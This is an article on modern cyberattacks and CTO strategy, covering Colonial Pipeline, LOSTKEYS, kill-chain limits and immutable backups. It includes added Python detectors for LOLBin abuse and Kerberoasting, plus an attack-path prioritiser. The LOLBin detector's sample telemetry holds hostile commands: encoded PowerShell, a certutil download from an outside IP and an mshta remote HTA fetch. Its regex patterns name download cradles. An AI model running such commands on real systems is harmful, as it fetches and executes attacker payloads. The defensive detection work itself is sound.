Cyberattacks are becoming increasingly complex because organizations are more interconnected than ever before while threat actors are better resourced and digital environments are harder to defend.
The ability to prevent an attack — and more importantly, fully recover from one — is no longer about guarding a perimeter. For a chief technology officer, a strong security program is about managing a dynamic, continuous and highly unpredictable IT risk environment.
Complex attacks in the news
The Colonial Pipeline incident of May 2021 is a useful starting point. Affiliates of the DarkSide ransomware-as-a-service group compromised the company's corporate IT network, and Colonial shut down pipeline operations itself as a precaution because it could not be certain the operational technology side was unaffected, disrupting the delivery of petroleum products across much of the southeast United States. This was a financially motivated criminal ransomware attack, not a nation-state espionage operation.
What made Colonial instructive was not technical sophistication. Initial access came through a compromised password for a legacy VPN account that did not require multi-factor authentication; no advanced knowledge of industrial control system protocols or SCADA (supervisory control and data acquisition) systems was needed. One reused credential on an unmanaged remote-access path was enough to take a critical-infrastructure operator offline, which is exactly why a perimeter-centric view of security is inadequate.
Fast-forward to May 2025, when Google's Threat Intelligence Group reported that since the start of the year the Russian state-backed ColdRiver group had been using new LOSTKEYS malware to steal files and login credentials in espionage attacks on Western governments, journalists, think tanks and non-governmental organizations. LOSTKEYS steals files matching a hard-coded list of extensions and directories and sends system information and the list of running processes to the attacker. Notably, it is delivered through a fake CAPTCHA page that instructs the victim to paste a PowerShell command into the Windows Run dialog, so the first stage runs by the user's own hand rather than through an exploit.
Digging deeper into the complexity of cyber threats, attackers routinely chain several techniques, such as phishing, social engineering, malware, lateral movement, privilege escalation and data exfiltration, across different systems and platforms. Their intent is to evade detection and maximize leverage: data is typically exfiltrated before the ransomware is detonated, so the victim faces both an outage and a leak (double extortion), and a clean restore alone does not end the incident.
Threat actors also use AI to craft convincing phishing emails and to triage vulnerabilities, which increases their efficiency, helps scale attacks and makes detection harder. Polymorphic malware that mutates to evade signature-based antivirus is now common. Tooling frequently relies on encryption, abuse of living-off-the-land binaries (LOLBins: legitimate, signed system utilities such as PowerShell, certutil or mshta turned to malicious ends), fileless techniques, and payloads that operate only in memory, all of which reduce the chances of being caught by tools that look for malicious files on disk.
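As an added illustration (not code from the article or from Fenix24), here is the kind of detection logic that catches LOLBin abuse by what the binary is asked to do rather than by a file signature. It runs over a handful of constructed process-creation events whose field names follow Sysmon Event ID 1 as an assumption; the rule names, patterns and parent/child pairing are mine, not a vendor's.

```python
"""Rule-based detection for LOLBin and fileless execution patterns.

Added example; not code from the article or from Fenix24. Input events are
constructed for this demo and mimic the field names of Sysmon Event ID 1
(process creation) as an assumption, not a real export.
"""
import json
import re
from dataclasses import dataclass

# (rule name, regex on the process image basename, regex on the command line).
# Each rule describes how a legitimate signed binary is abused, so a normal
# invocation of the same binary does not fire.
LOLBIN_RULES = [
    ("encoded-powershell", r"^(powershell|pwsh)(\.exe)?$",
     r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("powershell-download-cradle", r"^(powershell|pwsh)(\.exe)?$",
     r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biex\b|invoke-expression)"),
    ("mshta-remote-script", r"^mshta(\.exe)?$",
     r"(?i)(https?://|javascript:|vbscript:)"),
    ("rundll32-script-host", r"^rundll32(\.exe)?$",
     r"(?i)(javascript:|vbscript:)"),
    ("regsvr32-scriptlet", r"^regsvr32(\.exe)?$",
     r"(?i)(/i:\s*https?://|scrobj\.dll)"),
    ("certutil-fetch-or-decode", r"^certutil(\.exe)?$",
     r"(?i)(-urlcache|-decode\b)"),
    ("wmic-remote-xsl", r"^wmic(\.exe)?$",
     r'(?i)/format:\s*"?https?://'),
]

# A document viewer or mail client has no business launching a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    time: str
    user: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[Finding]:
    """Apply every rule to one process-creation event."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = [name for name, image_re, cmd_re in LOLBIN_RULES
            if re.search(image_re, image) and re.search(cmd_re, cmd)]
    if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
        hits.append("office-spawned-script-host")
    return [Finding(h, event.get("UtcTime", ""), event.get("User", ""), image, cmd)
            for h in hits]


def analyze(jsonl: str) -> list[Finding]:
    """Run the rules over newline-delimited JSON events."""
    findings: list[Finding] = []
    for line in jsonl.splitlines():
        if line.strip():
            findings.extend(evaluate(json.loads(line)))
    return findings


# Constructed sample telemetry: two benign lines, then three malicious ones.
SAMPLE_EVENTS = r"""
{"UtcTime": "2025-05-12 09:01:10", "User": "CORP\\mwong", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-ChildItem C:\\Logs"}
{"UtcTime": "2025-05-12 09:02:33", "User": "CORP\\mwong", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -hashfile C:\\Temp\\installer.msi SHA256"}
{"UtcTime": "2025-05-12 09:14:02", "User": "CORP\\jsmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"UtcTime": "2025-05-12 09:14:20", "User": "CORP\\jsmith", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.txt"}
{"UtcTime": "2025-05-12 09:14:41", "User": "CORP\\jsmith", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta http://203.0.113.5/p.hta"}
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.time} {f.user:<12} {f.rule:<28} {f.command_line}")
```

The two benign lines (an admin listing a directory, a hash check with certutil) produce nothing; the lines that fire are the encoded PowerShell launched by Word (two findings: the encoding and the parent), the certutil download cradle and the remote HTA. Tune the command-line patterns against your own baseline before deploying; the parent/child rule in particular is cheap and high-signal.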
Nation-state and organized criminal groups continue to run coordinated, well-funded campaigns with custom malware and deep reconnaissance, pursuing espionage, sabotage, financial gain and geopolitical disruption.
CTOs must stay ahead of advancing threat actor tactics
With increasingly complex attacks in mind, a CTO must stay immersed in the current threat landscape, especially what may lie around the corner. Advanced persistent threats (APTs), which focus on long-term access, data theft and compromise of critical systems, and ransomware-as-a-service (RaaS), in which operators lease ready-made ransomware and infrastructure to affiliates who carry out the intrusions for a share of the proceeds, are both growing in sophistication.
Attackers now commonly target third-party vendors and software dependencies to compromise multiple organizations at once. And more of them are now using AI and automation to scale phishing, evade detection and exploit vulnerabilities faster.
The expanding attack surface is most acute in three areas:
- Cloud infrastructure. As organizations migrate to the cloud, misconfigurations (publicly readable storage, over-broad IAM roles), unsecured APIs and hybrid setups create new exposures. Protecting and recovering data in the cloud is also harder than it looks: under the provider's shared-responsibility model, backing up and restoring your data remains your job.
- Remote and hybrid workforces. Increased use of personal devices and public networks dissolves the perimeter and weakens traditional defenses. Home offices and personal devices must be treated as assets that can be compromised.
- IoT and OT devices. These devices often lack basic security controls (no authentication, unpatched firmware, flat network access), making them attractive entry points for attackers.
The human factor complicates security through evolving social engineering tactics. Many breaches still stem from phishing and user error. Threat actors go after your users as well as your IT help desk, impersonating employees to obtain password or MFA resets. Continuous security awareness training is therefore critical and one of a CTO's most important responsibilities. But the burden cannot rest on individual employees alone: controls such as phishing-resistant MFA and identity verification at the help desk have to hold on the day a person is fooled.
Of course, finding and retaining skilled security professionals is increasingly challenging. CTOs must therefore align cybersecurity spending with risk exposure and business goals, advocating for investment in modern tools and a deliberate, layered program of hardening defenses.
Re-examining the traditional cyber kill chain
The traditional cyber kill chain, Lockheed Martin's seven-stage model, has been influential in framing a cyberattack as a sequence of predictable stages, from reconnaissance to exfiltration. Later frameworks such as MITRE ATT&CK catalogue tactics and techniques in far more detail, and NIST and CIS controls map defenses onto them, but the linear kill-chain mental model still shapes many programs, and in today's threat landscape it falls short in several important ways:
- Linear, Static Model. Modern attacks are dynamic, iterative and non-linear: attackers loop back to reconnaissance and re-establish access after every setback.
- Focus on Perimeter Defense. Heavy emphasis on preventing initial access leaves little for what happens once a threat actor is past the perimeter, which they regularly are. Organizations make the mistake of prioritizing resistance over recovery, when recovery is what bounds the damage.
- Lack of Post-Exploitation Focus. Modern attacks persist and adapt after exploitation, maintaining stealthy access while pivoting across networks.
- Assumes Single-Vector Attacks. Adversaries chain multiple vectors in one intrusion (phishing for access, then lateral movement and privilege escalation).
- Ignores Insider Threats. Security teams focus on external adversaries, yet once a threat actor holds valid credentials and a foothold they are indistinguishable from an insider. If someone on your IT staff could do damage with their access, so can a threat actor who has taken over their account.
- Failure to Address Cloud and Hybrid Environments. The kill chain was designed for on-premises environments. Modern attacks target cloud, SaaS and hybrid infrastructures, which require different telemetry, detection and response strategies.
- Underestimates Defense Evasion. The model assumes detection occurs in the early stages, but attackers increasingly arrive through the same commercial remote-access channels as users, such as VPN, Citrix, Horizon, TeamViewer, Quick Assist and ScreenConnect, so their activity looks legitimate. A practical control is an allowlist of sanctioned remote-access tools, with any other tool alerted on and blocked.
- Inability to Handle Lateral Movement. Minimal focus on movement inside the network after the breach leaves attackers free to harvest credentials, pass the hash, and Kerberoast (request Kerberos service tickets for Active Directory accounts that have service principal names, then crack the tickets offline to recover those accounts' passwords).
- Delayed Detection and Response. Kill-chain disruption tactics prioritize prevention and detection; an assume-breach posture treats rapid, clean recovery as a primary means of disruption as well.
- Misses Targeted Attacks and APTs. The model assumes mass-scale attacks with predictable patterns, whereas attacks customized to a target environment stay undetected far longer.
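Kerberoasting, named in the list above, is one of the easier lateral-movement steps to detect because the domain controller logs every service-ticket request. The detector below is an added example, not code from the article or from Fenix24: it flags an account that requests RC4-encrypted service tickets for many distinct service accounts in a short window, run over constructed Windows Security event 4769 records whose flattened dict shape is my assumption (the field names match the event; the threshold and window are mine).

```python
"""Kerberoasting detector over Windows Security event 4769 (TGS request).

Added example; not from the article or from Fenix24. The events below are
constructed and flattened into dicts (an assumption about log shape; real
4769 records arrive as XML/EVTX carrying the same field names).
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

RC4_HMAC = "0x17"          # ticket encryption type most cracking tools ask for
DEFAULT_THRESHOLD = 5      # distinct service accounts
DEFAULT_WINDOW = timedelta(minutes=10)


@dataclass(frozen=True)
class Alert:
    account: str            # account that requested the tickets
    client: str             # source IP of the requests
    first_seen: datetime
    services: tuple         # service accounts whose tickets were requested


def _candidate(event: dict, rc4_only: bool) -> bool:
    """Keep successful TGS requests for user (not computer) service accounts."""
    if event.get("EventID") != 4769 or event.get("Status", "0x0") != "0x0":
        return False
    if rc4_only and event.get("TicketEncryptionType", "").lower() != RC4_HMAC:
        return False
    svc = event.get("ServiceName", "")
    # computer accounts ($) and krbtgt tickets are noise for this hunt
    return bool(svc) and not svc.endswith("$") and svc.lower() != "krbtgt"


def detect_kerberoasting(events, threshold=DEFAULT_THRESHOLD,
                         window=DEFAULT_WINDOW, rc4_only=True) -> list[Alert]:
    """Alert when one account/IP pulls tickets for many distinct service
    accounts inside a sliding time window."""
    per_source = defaultdict(list)
    for e in events:
        if _candidate(e, rc4_only):
            key = (e["TargetUserName"], e["IpAddress"])
            per_source[key].append((datetime.fromisoformat(e["TimeCreated"]),
                                    e["ServiceName"]))

    alerts = []
    for (account, ip), reqs in per_source.items():
        reqs.sort()
        best, best_start, start = set(), None, 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1          # slide the window forward
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) > len(best):
                best, best_start = distinct, reqs[start][0]
        if len(best) >= threshold:
            alerts.append(Alert(account, ip, best_start, tuple(sorted(best))))
    return alerts


def _ev(t, user, ip, svc, etype="0x17"):
    """Build one constructed 4769 record."""
    return {"EventID": 4769, "TimeCreated": t, "TargetUserName": user,
            "IpAddress": ip, "ServiceName": svc,
            "TicketEncryptionType": etype, "Status": "0x0"}


# Constructed sample: a normal user over an hour (AES tickets, few services),
# and a compromised account requesting RC4 tickets for six service accounts in
# under two minutes, plus a computer-account ticket that the filter ignores.
SAMPLE_4769 = [
    _ev("2025-05-12T08:10:00", "mwong", "10.0.0.21", "svc_sql", "0x12"),
    _ev("2025-05-12T08:40:00", "mwong", "10.0.0.21", "svc_web", "0x12"),
    _ev("2025-05-12T09:05:00", "mwong", "10.0.0.21", "FS01$", "0x12"),
    _ev("2025-05-12T09:14:02", "jsmith", "10.0.0.45", "svc_sql"),
    _ev("2025-05-12T09:14:05", "jsmith", "10.0.0.45", "svc_web"),
    _ev("2025-05-12T09:14:09", "jsmith", "10.0.0.45", "svc_backup"),
    _ev("2025-05-12T09:14:12", "jsmith", "10.0.0.45", "svc_sharepoint"),
    _ev("2025-05-12T09:14:16", "jsmith", "10.0.0.45", "svc_exchange"),
    _ev("2025-05-12T09:14:20", "jsmith", "10.0.0.45", "WEB01$"),
    _ev("2025-05-12T09:15:30", "jsmith", "10.0.0.45", "svc_reporting"),
]

if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_4769):
        print(f"{a.first_seen} {a.account}@{a.client} requested tickets for "
              f"{len(a.services)} service accounts: {', '.join(a.services)}")
```

Two caveats for production use. If your service accounts enforce AES, roasting requests arrive with encryption type 0x12 and the RC4 filter hides them, so run a second pass with rc4_only=False and a higher threshold. And detection is the fallback, not the fix: service accounts with long random passwords or group managed service accounts make a cracked ticket worthless.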
If your organization assumes, rightly, that a breach can occur, then a modern defense works the problem in reverse: start from the assets that matter most and map the attack paths back to their entry points. Defend what matters most, not just what is convenient, and continually run tabletop exercises that simulate the most complex attacks against those paths.
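To make "work the problem in reverse" concrete, here is an added example (mine, not the article's or Fenix24's) over a constructed toy environment. Nodes are hosts, identities and data stores; each edge is an assumed way an attacker moves from one to the next. The code walks backwards from the crown jewels to find which nodes can reach them at all, enumerates the full attack paths from the entry point, and ranks the intermediate nodes by how many paths run through them, which is the list you harden first.

```python
"""Working an attack graph backwards from the assets that matter.

Added example; not code from the article or from Fenix24. The environment is a
constructed toy: nodes are hosts, identities or data stores, and each edge is
an assumed way an attacker moves from one to the next.
"""
from collections import Counter, defaultdict, deque

# (from, to, technique). Edges are the attacker's options, not a network map.
EDGES = [
    ("internet", "vpn-gateway", "valid account, no MFA"),
    ("internet", "web-app", "exploit public-facing app"),
    ("vpn-gateway", "helpdesk-ws", "RDP with the VPN user's credentials"),
    ("vpn-gateway", "printer-vlan", "scan"),
    ("web-app", "app-server", "web shell"),
    ("helpdesk-ws", "domain-admin-cred", "dump cached credentials"),
    ("app-server", "sql-backend", "connection string in config"),
    ("domain-admin-cred", "domain-controller", "pass-the-hash"),
    ("domain-admin-cred", "backup-server", "admin logon"),
    ("domain-controller", "backup-server", "push script via GPO"),
    ("domain-controller", "customer-data", "DCSync, then any account"),
    ("sql-backend", "customer-data", "read tables"),
]
ENTRY_POINTS = {"internet"}
CROWN_JEWELS = {"backup-server", "customer-data"}


def upstream_of(edges, targets):
    """Reverse reachability: every node from which some target can be reached.
    This is the 'map backwards from assets' step; anything outside the set
    cannot hurt the jewels and is a lower hardening priority."""
    rev = defaultdict(list)
    for src, dst, _ in edges:
        rev[dst].append(src)
    seen, queue = set(), deque(targets)
    while queue:
        node = queue.popleft()
        for src in rev[node]:
            if src not in seen:
                seen.add(src)
                queue.append(src)
    return seen - set(targets)


def attack_paths(edges, entries, jewels):
    """All simple paths from an entry point to a crown jewel, with techniques."""
    adj = defaultdict(list)
    for src, dst, technique in edges:
        adj[src].append((dst, technique))
    paths = []

    def walk(node, path, steps):
        if node in jewels:
            paths.append((tuple(path), tuple(steps)))
        for dst, technique in adj[node]:
            if dst not in path:             # simple paths only, no cycles
                walk(dst, path + [dst], steps + [technique])

    for entry in sorted(entries):
        walk(entry, [entry], [])
    return paths


def choke_points(paths):
    """Intermediate nodes ranked by how many attack paths run through them.
    Breaking the top ones severs the most routes for the least effort."""
    counts = Counter(node for path, _ in paths for node in path[1:-1])
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    paths = attack_paths(EDGES, ENTRY_POINTS, CROWN_JEWELS)
    print(f"{len(paths)} paths to crown jewels; upstream of them: "
          f"{sorted(upstream_of(EDGES, CROWN_JEWELS))}")
    for path, steps in paths:
        print(" -> ".join(path))
        print("   via: " + " | ".join(steps))
    print("choke points:", choke_points(paths))
```

On this toy graph the printer VLAN drops out immediately (nothing reachable from it touches a jewel), while the VPN gateway, the help-desk workstation and the cached domain-admin credential each sit on three of the four paths. Enforcing MFA on the VPN and removing cached privileged credentials from help-desk machines therefore buys more than hardening the SQL backend, which sits on one path. Real environments need the graph to come from your identity and network inventory rather than a hand-written list, but the prioritization logic is the same.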
Protecting data is your best defense
It’s important to remember that no cyber defense program is perfect. Without properly orchestrated immutable data backups, an organization risks significant operational disruption, financial loss, permanent damage to its IT systems and reputational harm. Immutability means that a backup, once written, cannot be altered or deleted for its retention period, even by an administrator whose credentials the attacker now holds; that is what makes your information recoverable after a breach. Two caveats keep the promise honest: the immutable copies must live outside the identity plane the attacker controls (separate credentials, separate account or storage), and restores must be tested regularly, because an untested backup is an assumption rather than a recovery. While you can’t always prevent a cyberattack, multiple backups that your adversaries cannot touch, however sophisticated their tactics, make recovery a matter of time rather than luck.
An effective CTO is one who acts as a cyber risk strategist, technology enabler and change agent. A CTO must ensure security is embedded in every layer of the business. It’s about creating a resilient, adaptive and security-conscious organization, not just buying into the latest tools and hoping they all work well together.
About the Author
Brandon Williams is Chief Technology Officer of Chattanooga, Tennessee-based Fenix24, the world’s first civilian cybersecurity force and an industry-leading ransomware restoration and recovery company. Brandon has more than 20 years of experience in networking, infrastructure design, implementation and security. He finds the most rewarding experiences are blending technology with security, providing resilience to the business while maintaining excellent user experience.
Brandon can be reached on LinkedIn and Fenix24’s company website